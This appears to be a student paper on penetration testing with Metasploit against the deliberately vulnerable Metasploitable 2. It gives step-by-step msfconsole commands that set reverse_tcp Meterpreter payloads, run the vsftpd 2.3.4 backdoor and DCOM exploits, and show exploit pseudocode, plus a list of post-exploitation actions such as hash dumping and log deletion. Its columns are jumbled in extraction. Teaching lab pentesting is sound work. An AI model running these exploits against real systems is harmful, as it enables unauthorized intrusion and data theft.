See discussions, stats, and author profiles for this publication at: https://www.researchgate.

net/publication/318710609

Penetration Testing and Metasploit

Article · April 2017

CITATIONS READS
6 13,272

1 author:

Michael Moore
Jackson State University
1 PUBLICATION   6 CITATIONS   

SEE PROFILE

Some of the authors of this publication are also working on these related projects:

Independent Study 2017 View project

All content following this page was uploaded by Michael Moore on 26 July 2017.

The user has requested enhancement of the downloaded file.

 Penetration Testing and Metasploit

Michael D. Moore
Computer Science Department
Jackson State University
Jackson, MS USA
dustan26@live.com

Abstract​—In this paper, penetration testing in general will be important in our everyday lives. When people say they want
discussed, as well as how to penetration test using Metasploit on security, what is probably heard is that they want a sense of
Metasploitable 2. Metasploitable 2 is a vulnerable system that I security. It really makes sense if you think about it. Feeling
chose to use, as using any other system to do this on would be
secure isn’t necessarily the same thing as being secure. If
considering hacking and have could have bad consequences. The
main purpose of the research is to show the various tools used everyone understood what kinds of dangers are out there, they
when trying to find vulnerabilities in a system. By using would make real security their first priority.
Metasploit to test a system, we can find the vulnerabilities that Given the right environment and opportunity, anyone
need to be fixed in order to better protect the system. Certain could use the skills they learn using programs like Metasploit
areas like network protocols, firewalls, and basic security issues to stop the malicious behavior of others. When people set out
will be explored in this research. to make computer systems, they don’t initially consider every
possible exploit available within it. There are a lot of moving
While there are a lot of different ways to do penetration
testing, I have chosen to use Metasploit because of the broad uses parts when it comes to making a system and it’s everyone’s
it has and its simplicity. We will have the option of either using job to explore all the options they have in order to provide a
the community version of the product, which is mostly secure and safe system. This is where penetration testing tools
automated, or by using the command line within metasploit. Both comes in handy.
of these options will be explored in this paper. Alongside all of the When it comes to the security of computer systems, we
tools used in Metasploit, I will show how to effectively find the can never leave anything to chance. All it takes is for one
vulnerabilities within a system of your choice. After going
hacker trying to exploit a system to gain access to personal
through all of the steps in this paper, anyone should be able to try
and exploit any system they feel is vulnerable. and private data of its users and operators. By using these
testing techniques described in the paper, people can get a
Keywords— vulnerabilities, Stuxnet, penetration testing, jump on the bad guys looking to harm and infiltrate systems
Metasploit, Metasploitable 2, pen-testing, exploits, Nmap, and that do not belong to them.
Kali Linux. The things that are put into this paper are to only be used
for the appropriate manner and are no way intended to lead
one to become a hacker. The methods described are meant to
I. INTRODUCTION help one if they were intending in learning certain goals that
pertain to penetration testing of one’s own system or a system
that you have permission for.
At the very beginning of the Internet, the world had a lot There are far too many people that are taking what they are
going on for itself in terms of security. As long as you thought learning and applying it in an unethical way, which will create
about that as the fact that not many people had access to the havoc and attain a monetary gain. No one should take what
internet, therefore there were less attackers to deal with. they learn and use it against anyone in that manner.
Security wasn’t very important back then, but as the years
moved on, we got real big real fast and have been playing
catchup ever since.
With new technology being made every year, we II. PENETRATION TESTING
constantly have to come up with new ways to stop malicious
activity within our systems. Not only do businesses need Penetration testing encapsulates many different things.
constant upkeep in security, but home professionals are well, Some of those things include Wifi, networks, software, and
especially when dealing with servers. Security is so very hardware systems. Most systems have some form of
vulnerabilities present when launched. The vulnerabilities are software out into the world before it’s ready could result in
known as zero day exploits. Zero day exploits are usually catastrophic failure.
either known by the companies and just don’t think it’s bad As companies become bigger over the years, we owe it
enough to fix or don’t know about them at all. There are many to ourselves to conduct testing on all of the systems in order to
issues with the interactions between software and hardware show our products at its finest hour and not have to worry
that can remain unknown for years before they are found and about the possible zero day exploits that have been left behind.
some are never found because that issue has not presented Here shown below is just one person’s estimated damage
itself. report due to cyber crimes that could have been prevented if
Penetration testing can be defined as being a means for a maintenance on the systems would have been done.
company or business to access the vulnerabilities within it’s
system at any given time. As systems change, like the addition
of new software or hardware changes, more vulnerabilities can
present themselves. The best way to try and stop these
vulnerabilities from being found is to either hire someone
full-time to constantly do penetration testing or if money is
tight, hire someone occasionally to do the testing.
Although penetration testing by professionals might not
find every vulnerability in the system, it’s still necessary to
make sure to provide every effort possible against people who
might try to test the system maliciously. Among the many
reasons for doing penetration testing are financial
responsibilities, security issues, and information protection[2].
If you were to do penetration testing on a system that is not
yours, you should definitely make sure you get a right to hack
and nondisclosure agreement signed[2].
When it comes to protecting computer systems,
Metasploit is a good what to do that. Metasploit is only one of
many penetration testing programs available in the world. By
using this program, you will surely be able to quickly identify Source[2].
any vulnerability through the exploitation of the system, either
manually (command line style) or automatically (secure web
based GUI type).
There are many different types of penetration testing
tools available to explore. Metasploit, Kali Linux, Wireshark, III. METASPLOITABLE 2
w3af, John the Ripper, Nessus, Nmap, Dradis, and BeEf are a
few of them[1]. Some of the various types of attacks that can Metasploitable 2 is the system that is being used in the
be done on a system include BlueTooth, PC microphone, research. It is a linux based OS that is made distinctively with
wifi(Wpa-protected), and man in the middle attacks[1]. Kali Metasploit in mind to be exploited by its users. It is available
Linux is an operating system filled with various open source to download on the metasploit website for anyone who wishes
programs strictly developed with the hacker world in its mind. to use do penetration testing. Although I could use any
It’s not an operating system to be take lightly as any use of it penetration testing program I wish, I will be using Metasploit
illegally could get you jailed if you were ever caught. The two as discussed previously.
main penetration testing is either overt or covert[5]. Overt In order to set up the vulnerable machine, you need to
testing is when you have the complete cooperation of the download it from the website (www.metasploit.com) and open
owners of the systems in which you are testing on and covert the virtual machine file inside of a virtual box of your choice.
is when you are basically testing the staff’s ability to figure After having done these steps, you are on your way to test the
out the exploits being done on the system[5]. vulnerabilities of this system and also on your way to
Some of the other things to consider when having a becoming a penetration tester. All you then need to do is enter
business is the financial aspects. There are a lot of companies msfadmin for the username and password and you will be
out there that are being crippled due to lack of testing or connected shortly. Even though this is just a test system, it has
preparation. Sometimes it could be the cause of trying to get all the capabilities of any operating system that would would
the product out before it is ready. If that is the case, then one wish to test in the future.
might consider giving the project another few weeks in order
to make sure the bugs are all worked out, because putting
 security issues. There are a tons of PLC’s around the world,
A. METHODS AND METHODOLOGIES and to think a worm like this one can affect any network like
Some of the methods and methodologies that are being this is very scary. “There are two main phases of Stuxnet
used include such things as Open Web Application Security worm: first is ‘propagation phase’ which is the characteristic
Project and Open Source Security Testing Methodology of each worm and second one is ‘injection phase’. In first
Manual[8]. Not all methods need to be used for every phase, Stuxnet worm propagates in local area network and
application. Some are only designed to used for certain things. update its files through peer to peer communication. In second
These methods are still integrated into today’s standards. Open phase when it finds its actual target i-e Siemens WinCC
Source Security Testing Methodology Manual can be used in control and monitoring system connected to PLC it starts
places like physical security, human factor, wireless functioning and deviates them from their normal
communication, telecommunication, data networks and behavior[13]”.
operating systems[8]. Using something like Kali Linux can
provide many uses such as SQL injection, database security
audit, network traffic eavesdropping/ tampering, network
infrastructure attack, network stress testing, denial of service
attacks, manipulating of user data, web application testing[8].

IV. AUTOMATED AND MANUAL TESTING

There are differences between using either automated or

manual testing. With the automated testing, you might not
necessarily understand how everything works or why it’s
happening. If you use manual testing, you have much more
control over what happens with the process and are able to
learn all the ways the systems works together. Without getting
into the financial difference between the two, the manual
method seems to be the best way to do penetration testing.
One thing to consider when either using manual or
automatic is the time frame it takes to do the job. While both
ways have their benefits, the time it takes is much faster when
penetration testing automatically[2]. By penetration testing
automatically, the coding used to attack cover various
platforms[2]. When doing it manually, you have to change the
code every time you execute it to cover all the different
platforms[2]. Unless you are a seasoned professional, you Figure 2: Screenshot of Metasploit Pro Console.
should leave the manual penetration testing to the pros[2].
“Experienced hackers are used to writing own scripts or even
automate one of the stages, in order to proceed quickly and
VI. PENETRATION TESTING USING METASPLOIT
find more security leaks in target systems[2].”

Before you download and use Metasploit, you need to make

sure your PC can handle all of the following requirements[6]:
V. METASPLOIT ON STUXNET
While there are a lot of uses for Metasploit, one of the most ● At least 2 GHz processor
known applications of it is using it on Stuxnet. The Stuxnet ● 2 GB RAM(recommended: 4 GB)
worm was used against programmable logic controllers and ● At least 500MB hard drive space
exploited the zero day vulnerabilities in Windows[13]. It was ● 10/100 Mbps network interface card
used against the “Iranian nuclear facilities” in 2010[13]. Rahat ● Windows XP-current Windows OS
Masood et al used Metasploit against Stuxnet. They exploited ● Ubuntu 8-current
three different vulnerabilities within Stuxnet[13]. They ● Firefox from 4 on to current
exploited the server service, the print spooler, and the .LNK ● Chrome from 10 to current
vulnerability[13]. ● IE from 9 to current
Stuxnet was one of the biggest debacles in the recent years,
and if not learned from, will be used in future events aimed at
 Metasploit has a wide array of ways to do penetration ● info (exploit name)(this will get info about a specific
testing. One way is using the community online version, exploit to see where or not you want to use it)[10].
which is automatic, and the other is to use the console version, ● show payloads(this will let you see all the available
which is similar to command prompt and is considered payloads for that specific exploit and show you which
manual. The company that made Metasploit(Rapid7) have one is preferred)[10].
made lots of other programs to help you along the way like ● info (payload)(this will show you info on the selected
AppSpider, InsightIDR, InsightVM, and Logentries. There are payload)[10].
many ways to access Metasploit. “Msfconsole is another ● set PAYLOAD(this sets the payload to selected one),
interface available for Metasploit interaction. Compared to show options(this shows all the options that need to
Msfcli, Msfconsole is more robust, scalable, and easier to be met in order to run the exploit)[10].
use[8].” ● show target(shows targets)[10].
One of the very first things that need to be done when ● set target(sets target)[10].
trying to test a particular system is to either know the IP or be ● run or exploit(this will perform the payload launch
able to locate the IPs of the systems remotely. Depending on on the current target and if successful will gain shell
which systems you are using, you need different command entry into the attack system[10].
line entries to get you that information[9]. You can use things
such as SNMP or netBIOS to find the IP addresses[9]. If you
are using a Linux based system, you could probably use the
arp-scan command followed by your IP to scan for all of the
IP addresses associated with your local area network[9]. Some
of these methods could take up to 15 hours, so make sure you
got some time on your hands[9].
Meterpreter is another part of Metasploit that gets used
quite a bit to exploit systems. By using meterpreter to get the
exploit and gaining access to its shell, you can perform a lot of
different things in the there. Some of them include token
stealing, dumping hashs, creating users, service control,
routing table alteration, screenshot taking, execute commands,
delete event logs, mouse control, editing/deleting files, and
uploading files[8].
There are a lot of other programs that intertwine with
Metasploit to help with penetration testing. Nessus 5 provides
lots of other options within the msfconsole[11]. First thing you
need to download Nessus and configure it for however you
wish to use it[11]. Select any plugins you need for your
journey and log in to the msfconsole[11]. Then, you will need
to enter the command load nessus and you are on your way to
Nessus usage[11].
Some of the basic commands when you are are the
metasploit console are:

Figure 1: Some other important commands. Source[6].

● help(which brings up some of the basic
commands)[10].
● back(this will allow you to go back to the msf>)[10].
● set LHOST(this will let you set YOUR listening -msf exploit(ms11_006_createsizeddibsection) >
host)[10]. -set payload windows/meterpreter/reverse_tcp
● set RHOST(this will let you set the ATTACK -payload => windows/meterpreter/reverse_tcp
host)[10]. -msf exploit(ms11_006_createsizeddibsection) >
● show exploit(this will show you all of the exploits -set LHOST 172.16.32.128
currently available in metasploit for any -LHOST => 172.16.32.128
situation)[10]. -smsf exploit(ms11_006_createsizeddibsection) >
● search (exploit name)(this will allow you to find a -set LPORT 443
specific exploit to get info about)[10]. -LPORT => 443
-msf exploit(ms11_006_createsizeddibsection) >
-exploit
[*] Creating 'msf.doc' file...X
[*] Generated output file
/opt/metasploit3/msf3/data/exploits/msf.docY
msf exploit(ms11_006_createsizeddibsection) >

Figure 1: Here is some sample code that shows some of the

uses of the aforementioned commands.
Source[5].

There are a lot of hacking contests that people set up for

their friends in the hacking community that are using
Metasploit’s build in programs, but in the Kali OS. As we
have seen nmap and other programs can be used in multiple
systems and frameworks. Here in the article titled “Hack the
Fartknocker VM (CTF Challenge),” they talk about finding
port hacking and hidden messages in files found along the
way[12]. There are a lot of different avenues used in the
article like SSH, FTP, and port hacking. Wireshark was used
to help along the way. Below I have shown the fun side of the
hacking world with a screen of what the person who initiated
the challenge left for the person who was able to hack the VM.

A. Manual Penetration Testing

One of the ways in which to do penetration testing is

manually. By using a command line like console, the users are
able to have full control over their exploitations. Scripts are
written by some professional in order to automate the process
of exploiting vulnerabilities. Not all scripts are the same, as
the systems that are being exploited are different and
Figure 1: Flowchart for generic path used to exploit using sometimes require different methods. First the user has to gain
Metasploit. access to the system in order to push a payload, which will
fight to gain control of the current system.
Scripting languages are just one of the many ways to
automate all of the footwork required to do the job. “A script
based attack framework is a type of web attack program
written in scripting language[3].” Without scripting it would
take a lot longer to try exploits that require many steps, but
aren’t guaranteed success.
 21. attack_payload << "\xe\xf"
22. attack_payload << get_target_ret(5) // Target
Version: 5
23. attack_payload <random_alpha(409)
24. return attack_payload
25. end

Figure 3: Code Snippet from a Metasploit Script

Source: [3].

Figure 2: Script Attack on a Particular System.

Source[3].
Figure 3: A basic depiction of how Metasploit is used in
reference to penetration testing and vulnerability detection.
The below figure is a script written that will deliver a payload
to the system you wish to exploit[3]. B. Metasploit Framework Console

1. exploit_def() Here is where the good stuff starts. Some of the basics of
2. connection() how to access the console to do some manual exploitation of
3. exploit_preamble = "\x00\x00\x01" some systems. This process will show one example of an
4. version_find = probing_ver() exploit of a certain system, not necessarily Metasploitable 2.
5. if (version equals 5)
6. attack_payload = prepare_payload5() 1. One of the first steps is to open the console itself and
7. else enter in msfadmin for the username and the
8. attack_payload = prepare_payload4() password[4].
9. end 2. Next, you need to figure out what system and exploit
10. exploit_preamble << payload_length you wish to do[4].
11. socket.put(exploit_preamble) //Reqd by the protocol 3. Once you have that figured out and you have gotten
12. socket.get_once() the ip address of the system, you enter Nmap and
13. socket.put(attack_payload) //sending the attack then the ip address. The console will map the ports of
payload the system to see which ports are open[4].
14. socket.get_once() 4. With the open port in hand, we enter show commands
15.... # triggering vulnerability and find an exploit in the list that deals with remote
16. end pc[4].
17. def prepare_payload5() 5. “To get more information regarding the exploit you
18. attack_payload = shellcode can use the command, ‘info
19. attack_payload << rand_alpha(payload.length) exploit/windows/dcerpc/ms03_026_dcom’[4]”.
20. attack_payload << "\x010" + [-117].pack("X")
 6. Then, we need to enter use/”exploit” into the 7. Just like with the manual version, after gaining
console[4]. access, you have free roam on the system you now
7. Once that’s finished loading, we are going to need to control.
enter show options to find out what to do next to get
the exploit going further[4]. D. Common Exploits Known
8. Next, we need to enter the ip address ( set RHOST”ip
address”)we wish to exploit, and find the payload to 1. VSFTP Backdoor:
push onto the open port[4]. This exploit allows the user to gain access to the shell
9. We need to enter in show payloads to find compatible via a backdoor that was made in 2011 and removed
payloads for this exploit[4]. shortly thereafter.
10. "set PAYLOAD windows/meterpreter/reverse_tcp"
needs to be entered now into the console and then"set 2. MS08-067:
LHOST 192.168.42.128"[4] . This vulnerability relates to a remote pc entry given
11. Now enter check command to see if the “machine a certain request is entered[5].
vulnerable to the exploit or not” and if not just move
on with the command, exploit to perform the VSFTP Backdoor instructions[7]:
exploit[4]. 1. Login to the msf console.
12. If everything works like it’s supposed to, you should 2. Find your IP address.
gain access to the system and be able to do anything 3. Obtain the IP address from the Metasploitable 2
you want on the system. machine or whatever system you are exploiting..
4. Next, the user will then enter nmap -sS -sV -O
C. Metasploit Community (Metasploitable 2 IP address). This will provide you
with everything you can know about the ports on the
This version is a lot more simplistic to use since it is that particular system.
automated. When you download Metasploit, it comes with this 5. Enter “search vsftp[7].”
option which is done on your browser using you computer as 6. Enter “use exploit/unix/ftp/vsftpd_234_backdoor[7].”
the local host, which does all of the exploiting. Metasploit 7. Enter “show options[7].”
community was mainly invented to help bridge the gap 8. Enter “set RHOST”
between everyday penetration testers and people looking to do IPAddressofMachineExploiting[7].
the testing without really understanding every aspect of it. 9. Finally enter “exploit”.
Although using the community seems faster, you still need to
read up on all of the different techniques to be efficient at the
testing.

1. To access the web-based GUI, you need to find

where you installed Metasploit and select the GUI
from the list of files. It will open in your web
browser.
2. The next step is to enter in your login information
you provided at the time you did the setup for
Metasploit.
3. Click the open project tab to start a new project to
keep up with the different things you are going to be
doing with Metasploit, since not every system is
vulnerable in the same manner.
4. You can now scan for available systems to try to
exploit or enter in the ip address to get started.
5. With the system entered in, you can analyze the
system for available exploits and also push the
payloads automatically onto the systems.
6. After those steps, all that’s left to do is capture the
information and finish gaining access to the Figure 4: Screenshot of VSFTPD Backdoor exploit in action.
exploitable system.
 View publication stats

http://searchsecurity.techtarget.com/tip/Using-Metasploit-for-real-world-
security-tests. [Accessed: 15-Apr-2017].
VII. CONCLUSION [11] D. Dodd, “Penetration Testing and Shell Tossing with Meta... » ADMIN
Magazine,” ADMIN Magazine. [Online]. Available:
There are a lot of penetration testing programs out there and http://www.admin-magazine.com/Articles/Pen-Test-Tips. [Accessed:
Metasploit just so happens to be the best one that I could think 17-Apr-2017].
of to share with you. It has a lot of nice options and you can [12] “Hack the Fartknocker VM (CTF Challenge),” Hacking Articles,
use it either manually or automatically. Although the reasons 06-Apr-2017. [Online]. Available:
for and against the two have already been shown throughout http://www.hackingarticles.in/hack-fartknocker-vm-ctf-challenge/.
[Accessed: 18-Apr-2017].
the paper, I’d like to reiterate a few things. By doing all the
[13] R. Masood, U.-E.-G., and Z. Anwar, “SWAM: Stuxnet Worm Analysis
exploiting manual, you are able to control the way you try to in Metasploit,” 2011 Frontiers of Information Technology, 2011.
exploit a given system, it just might take a little bit longer.
Penetration testing is just one of the multiple ways to make
sure the information on your systems is secure and not open to
hacking. When you plan on doing penetration testing, I
suggest you give Metasploit a shot and you won’t be
disappointed. When looking into what programs that are
available to use across the internet, there are a lot of different
options to choose from. If you are not careful with any of the
programs, you could land yourself into some serious trouble.

REFERENCES

[1] M. Denis, C. Zena, and T. Hayajneh, “Penetration testing: Concepts,

attack methods, and defense strategies,” ​2016 IEEE Long Island
Systems, Applications and Technology Conference (LISAT)​, 2016.
[2] Y. Stefinko, A. Piskozub, and R. Banakh, “Manual and automated
penetration testing. Benefits and drawbacks. Modern tendency,” 2016
13th International Conference on Modern Problems of Radio
Engineering, Telecommunications and Computer Science (TCSET),
2016.
[3] H. Gupta and R. Kumar, “Protection against penetration attacks using
Metasploit,” 2015 4th International Conference on Reliability, Infocom
Technologies and Optimization (ICRITO) (Trends and Future
Directions), 2015.
[4] N. Talekar, “Penetration Testing with Metasploit Framework |
www.SecurityXploded.com​,” SecurityXploded.com. [Online].
Available:
http://securityxploded.com/penetration-testing-with-metasploit.php.
[Accessed: 31-Mar-2017].
[5] D. Kennedy, Metasploit: the penetration tester's guide. San Francisco,
CA: No Starch Press, 2011.
[6] O., “Hack Like a Pro - Null Byte « Wonder How To,” WonderHowTo.
[Online]. Available:
https://null-byte.wonderhowto.com/how-to/hack-like-a-pro/. [Accessed:
14-Apr-2017].
[7] “(Metasploitable Project: Lesson 8),” Metasploitable Project: Lesson 8:
Exploiting VSFTPD 2.3.4. [Online]. Available:
https://computersecuritystudent.com/SECURITY_TOOLS/METASPLO
ITABLE/EXPLOIT/lesson8/index.html. [Accessed: 14-Apr-2017].
[8] F. Holik, J. Horalek, O. Marik, S. Neradova, and S. Zitta, “Effective
penetration testing with Metasploit framework and methodologies,”
2014 IEEE 15th International Symposium on Computational Intelligence
and Informatics (CINTI), 2014.
[9] “Finding IP Addresses of Other Network Interfaces on Linux,”
pentestmonkey. [Online]. Available:
http://pentestmonkey.net/uncategorized/finding-ip-addresses-of-other-ne
twork-interfaces-on-linux. [Accessed: 17-Apr-2017].
[10] “How to use Metasploit commands for real-world security tests,”
SearchSecurity. [Online]. Available: